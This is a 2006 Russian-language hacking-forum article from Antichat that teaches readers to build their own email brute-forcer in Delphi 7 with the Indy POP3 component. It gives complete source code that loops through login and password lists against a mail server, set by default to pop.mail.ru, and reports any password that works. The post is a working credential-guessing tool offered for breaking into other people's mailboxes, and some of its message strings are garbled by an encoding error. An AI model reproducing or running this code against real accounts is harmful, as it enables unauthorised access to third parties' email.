Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
(Статья) Свой брут для почты |

02.07.2006, 17:40
|
|
Познающий
Провел на форуме: 294206
|
|
(Статья) Свой брут для почты
Простой перебор – глупейшее занятие, отнимающее много времени, но иногда по другому просто не как. Поэтому я и решил написать статейку, на примере взломщика почтовых ящиков, брута. Работу с почтовым ящиком построим на основе библиотеки Indy. Я буду работать в Delphi 7, где библиотека Indy является уже встроенной, так же как и для Delphi 6, а для более старых версии ее придется установить отдельно.
И так, приступим. Зайдите в делфу и уже на готовую пустую форму киньте четыре компонента TLabel. В свойство Caption каждого TLabel’а впишите: для первого – ‘Файл с логинами’, для второго – ‘Файл с паролями’, для третьего – ‘Адрес сервера’ и для четвертого – ‘Порт’. Теперь бросьте на форму четыре компонента TEdit. В свойстве Text каждого из них пишем: для первого – ‘logins.txt’, для второго – ‘passwords.txt’, для третьего – ‘pop.mail.ru’ и для четвертого – ‘110’. Теперь бросьте на форму кнопку, в которой свойство Caption измените на ‘Начать!’ и самое главное IdPOP31 с вкладки Indy Clients – компонент для работы по протоколу POP3.
Для большей солидарности можно бросить на форму еще и IdAntiFreeze с вкладки Indy Misc. Это компонент, который следит за тем, чтобы программа не зависала в ожидании ответа при работе с портом.
Теперь расположите все элементы которые мы поместили на форму, как вашей душе угодно. Скажу только одно, каждый Lable, тобишь 1,2,3… соответствует компонентам Edit, а точнее Label1 где Caption = Файл с логинами соответствует Edit1, так как именно в Edit1 будет указываться имя файла с логинами, ну и так далее… Надеюсь поймете.
У меня получилось вот так:
(рис. 1)
Теперь начинаем писать программный код. Создадим обработчик события OnClick для кнопки которую мы бросили на форму и повесим на него следующий код:
procedure TForm1.Button2Click(Sender: TObject);
var
LoginStrings, PassStrings: TStrings;
i, j: Integer;
begin
LoginStrings:=TStringList.Create;
PassStrings:=TStringList.Create;
LoginStrings.LoadFromFile(Edit1.Text);
PassStrings.LoadFromFile(Edit2.Text);
IdPOP31.Host := Edit3.Text;
IdPOP31.Port := StrToInt(Edit4.Text);
for i:=0 to LoginStrings.Count-1 do
for j:=0 to PassStrings.Count-1 do
begin
IdPOP31.Username := LoginStrings.Strings[i];
IdPOP31.Password := PassStrings.Strings[j];
try
IdPOP31.Connect;
except
end;
if IdPOP31.Connected then
begin
Application.MessageBox(PChar('Èìÿ:'+LoginStrings.S trings[i]+' Ïàðîëü:'+PassStrings.Strings[j]), 'Ïàðîëü íàéäåí!');
IdPOP31.Disconnect;
end;
end;
LoginStrings.Free;
PassStrings.Free;
end;
Ну вот практически и все. Комментировать весь программный код я не буду, так как хз, неохота уже.
Теперь откомпилируйте проект, сохраните его куда нить в отдельную папку. И в этой же папке с ексешником нашей программы создайте два текстовых файла. Один под названием, как вы уже догадываетесь logins.txt, а второй passwords.txt соответственно. Теперь забейте их, логинс – Никами, а пас – паролями, сохраните.
Вот теперь все! Можете запускать свой почтовый Брут и тестировать его.
|
|
|
|
|